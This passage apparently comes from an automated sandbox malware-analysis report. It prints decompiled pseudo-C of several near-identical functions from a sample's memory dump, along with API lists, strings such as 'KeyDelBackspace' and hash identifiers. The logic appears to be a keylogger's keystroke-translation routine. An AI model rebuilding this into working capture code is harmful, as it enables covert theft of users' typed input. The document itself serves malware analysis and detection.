                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 783433895-3409537306
                  • Opcode ID: 39b03309cb925559adc94f9655e3a5a9f0f01a3343eadd4f371930683951da97
                  • Instruction ID: 8aa69b91d737cd1935abe9d1b170b80890827fc85faedbd8b906090cccbd213a
                  • Opcode Fuzzy Hash: 39b03309cb925559adc94f9655e3a5a9f0f01a3343eadd4f371930683951da97
                  • Instruction Fuzzy Hash: EB31C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007200(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, 0x100079a8);
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 783433895-3409537306
                  • Opcode ID: a162cc495929e47f1e2b8db7e60090edff99d25f5f2755788ca8ad98c3a46845
                  • Instruction ID: da241092db117cf8670937f7e946dbca7f1b2fe6bc2353ea6322e4b84d0426b2
                  • Opcode Fuzzy Hash: a162cc495929e47f1e2b8db7e60090edff99d25f5f2755788ca8ad98c3a46845
                  • Instruction Fuzzy Hash: B031C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007211(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, 0x100079b0);
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 783433895-3409537306
                  • Opcode ID: 6fb5cf8c127330519ac590d7b260d6f1972dd4d19386bf32214d38e0e73a7627
                  • Instruction ID: 13d384bfb7d80fcaab74c7c21edcce233b970dd7a99a864e689220d7ee6072be
                  • Opcode Fuzzy Hash: 6fb5cf8c127330519ac590d7b260d6f1972dd4d19386bf32214d38e0e73a7627
                  • Instruction Fuzzy Hash: E831C0B8F042545BF722CB658C85B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007222(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, 0x100079b8);
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  0x10007222
                  0x10007222
                  0x10007229
                  0x100076f0
                  0x100076f5
                  0x10007727
                  0x10007727
                  0x10007731
                  0x10007759
                  0x1000775d
                  0x1000780e
                  0x10007810
                  0x10007816
                  0x1000781f
                  0x10007836
                  0x10007838
                  0x10007839
                  0x10007845
                  0x1000784e
                  0x10007853
                  0x10007855
                  0x10007857
                  0x10007879
                  0x10007880
                  0x10007880
                  0x10007857
                  0x10007855
                  0x10007763
                  0x10007774
                  0x10007776
                  0x1000777b
                  0x10007780
                  0x1000778f
                  0x10007794
                  0x10007798
                  0x100077be
                  0x100077cb
                  0x1000779a
                  0x100077a2
                  0x100077af
                  0x100077af
                  0x10007798
                  0x100077d0
                  0x100077d6
                  0x100077d8
                  0x100077f8
                  0x100077f8
                  0x10007807
                  0x10007807
                  0x1000788b
                  0x10007890
                  0x10007894
                  0x10007894
                  0x1000789b
                  0x1000789e
                  0x100078a1
                  0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 783433895-3409537306
                  • Opcode ID: b4064cf9196f1bd766f61690eec419dae147e0aac919e4e137b35742a66dca64
                  • Instruction ID: bead1d8953916fe6a2caf6aa6abcbb8af6aaada5367ea8c14ed574beb6cc7c0d
                  • Opcode Fuzzy Hash: b4064cf9196f1bd766f61690eec419dae147e0aac919e4e137b35742a66dca64
                  • Instruction Fuzzy Hash: E631C0B8F042545BF722CB658C85B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007233(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, 0x100079c0);
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  0x10007233
                  0x10007233
                  0x1000723a
                  0x100076f0
                  0x100076f5
                  0x10007727
                  0x10007727
                  0x10007731
                  0x10007759
                  0x1000775d
                  0x1000780e
                  0x10007810
                  0x10007816
                  0x1000781f
                  0x10007836
                  0x10007838
                  0x10007839
                  0x10007845
                  0x1000784e
                  0x10007853
                  0x10007855
                  0x10007857
                  0x10007879
                  0x10007880
                  0x10007880
                  0x10007857
                  0x10007855
                  0x10007763
                  0x10007774
                  0x10007776
                  0x1000777b
                  0x10007780
                  0x1000778f
                  0x10007794
                  0x10007798
                  0x100077be
                  0x100077cb
                  0x1000779a
                  0x100077a2
                  0x100077af
                  0x100077af
                  0x10007798
                  0x100077d0
                  0x100077d6
                  0x100077d8
                  0x100077f8
                  0x100077f8
                  0x10007807
                  0x10007807
                  0x1000788b
                  0x10007890
                  0x10007894
                  0x10007894
                  0x1000789b
                  0x1000789e
                  0x100078a1
                  0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 783433895-3409537306
                  • Opcode ID: ad526f3a44082b4da89a5289e758324e4cba0574a2e660b1230691faf556a316
                  • Instruction ID: 311b08e60e3b521a7c3a0356ba3012efa993796664cd4508c3663b1c0811d3ac
                  • Opcode Fuzzy Hash: ad526f3a44082b4da89a5289e758324e4cba0574a2e660b1230691faf556a316
                  • Instruction Fuzzy Hash: 9131C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007244(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, 0x100079c8);
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  0x10007244
                  0x10007244
                  0x1000724b
                  0x100076f0
                  0x100076f5
                  0x10007727
                  0x10007727
                  0x10007731
                  0x10007759
                  0x1000775d
                  0x1000780e
                  0x10007810
                  0x10007816
                  0x1000781f
                  0x10007836
                  0x10007838
                  0x10007839
                  0x10007845
                  0x1000784e
                  0x10007853
                  0x10007855
                  0x10007857
                  0x10007879
                  0x10007880
                  0x10007880
                  0x10007857
                  0x10007855
                  0x10007763
                  0x10007774
                  0x10007776
                  0x1000777b
                  0x10007780
                  0x1000778f
                  0x10007794
                  0x10007798
                  0x100077be
                  0x100077cb
                  0x1000779a
                  0x100077a2
                  0x100077af
                  0x100077af
                  0x10007798
                  0x100077d0
                  0x100077d6
                  0x100077d8
                  0x100077f8
                  0x100077f8
                  0x10007807
                  0x10007807
                  0x1000788b
                  0x10007890
                  0x10007894
                  0x10007894
                  0x1000789b
                  0x1000789e
                  0x100078a1
                  0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 783433895-3409537306
                  • Opcode ID: 3018831f3d2d7d46207b6938651625027ba0aae8da63efaf5cfa44b6499e9dc2
                  • Instruction ID: 74b2e92b555be62d4c67bea0bf12e908dc11cad6fd28d16d482c19b7e5004677
                  • Opcode Fuzzy Hash: 3018831f3d2d7d46207b6938651625027ba0aae8da63efaf5cfa44b6499e9dc2
                  • Instruction Fuzzy Hash: 9B31C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100072BB(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, 0x10007a58);
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
